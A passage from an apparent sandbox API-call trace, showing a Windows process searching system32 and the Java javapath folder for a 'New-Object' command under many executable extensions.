Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0224.295] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\New-Object.JS" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\new-object.js"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.295] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e020) returned 1 [0224.295] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dfc0) returned 1 [0224.295] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0224.295] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.295] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0224.295] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.296] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.296] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0224.296] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\New-Object.JSE" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\new-object.jse"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.296] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e020) returned 1 [0224.296] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dfc0) returned 1 [0224.296] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0224.296] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.296] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0224.296] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.296] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.296] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0224.297] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\New-Object.WSF" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\new-object.wsf"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.297] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e020) returned 1 [0224.297] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dfc0) returned 1 [0224.297] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0224.297] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.297] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0224.297] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.297] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.297] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0224.297] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\New-Object.WSH" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\new-object.wsh"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.298] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e020) returned 1 [0224.298] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dfc0) returned 1 [0224.298] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0224.298] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.298] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0224.298] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.298] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.298] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0224.298] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\New-Object.MSC" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\new-object.msc"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.299] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e020) returned 1 [0224.299] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dfc0) returned 1 [0224.299] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0224.299] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.299] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0224.299] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.299] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.299] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0224.299] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\New-Object.CPL" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\new-object.cpl"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.299] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e020) returned 1 [0224.300] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dfc0) returned 1 [0224.300] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0224.300] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.300] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x410, ftCreationTime.dwLowDateTime=0xad9773fa, ftCreationTime.dwHighDateTime=0x1d8c106, ftLastAccessTime.dwLowDateTime=0xad9773fa, ftLastAccessTime.dwHighDateTime=0x1d8c106, ftLastWriteTime.dwLowDateTime=0xad9773fa, ftLastWriteTime.dwHighDateTime=0x1d8c106, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0224.300] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.300] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.300] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x38 [0224.300] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\New-Object" (normalized: "c:\\program files (x86)\\common files\\oracle\\java\\javapath\\new-object"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.300] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e020) returned 1 [0224.300] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dfc0) returned 1 [0224.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0224.301] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.301] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf5f252ee, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf5f252ee, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0224.301] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.301] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0224.301] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\New-Object.ps1" (normalized: "c:\\windows\\system32\\new-object.ps1"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.301] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e020) returned 1 [0224.301] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dfc0) returned 1 [0224.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0224.301] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.302] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf5f252ee, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf5f252ee, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0224.302] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.302] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0224.302] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\New-Object.psm1" (normalized: "c:\\windows\\system32\\new-object.psm1"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.302] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e020) returned 1 [0224.302] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dfc0) returned 1 [0224.302] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0224.302] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.302] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf5f252ee, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf5f252ee, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0224.303] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.303] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0224.303] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\New-Object.psd1" (normalized: "c:\\windows\\system32\\new-object.psd1"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.303] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e020) returned 1 [0224.303] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dfc0) returned 1 [0224.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0224.303] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.303] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf5f252ee, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf5f252ee, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0224.303] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.303] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0224.304] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\New-Object.COM" (normalized: "c:\\windows\\system32\\new-object.com"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.304] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e020) returned 1 [0224.304] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dfc0) returned 1 [0224.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0224.304] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.304] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf5f252ee, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf5f252ee, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0224.304] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.304] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.304] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0224.305] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\New-Object.EXE" (normalized: "c:\\windows\\system32\\new-object.exe"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.305] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8e020) returned 1 [0224.305] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8dfc0) returned 1 [0224.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0224.305] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8dfd0) returned 1 [0224.305] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x653ef8e0b0 | out: lpFileInformation=0x653ef8e0b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xf5f252ee, ftLastAccessTime.dwHighDateTime=0x1d99d09, ftLastWriteTime.dwLowDateTime=0xf5f252ee, ftLastWriteTime.dwHighDateTime=0x1d99d09, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0224.305] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8df90) returned 1 [0224.305] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8e020) returned 1 [0224.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x653ef8db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0224.305] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\New-Object.BAT" (normalized: "c:\\windows\\system32\\new-object.bat"), lpFindFileData=0x653ef8dd30 | out: lpFindFileData=0x653ef8dd30*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0224.306] SetThreadErrorMode (dwNewMode=0x0, 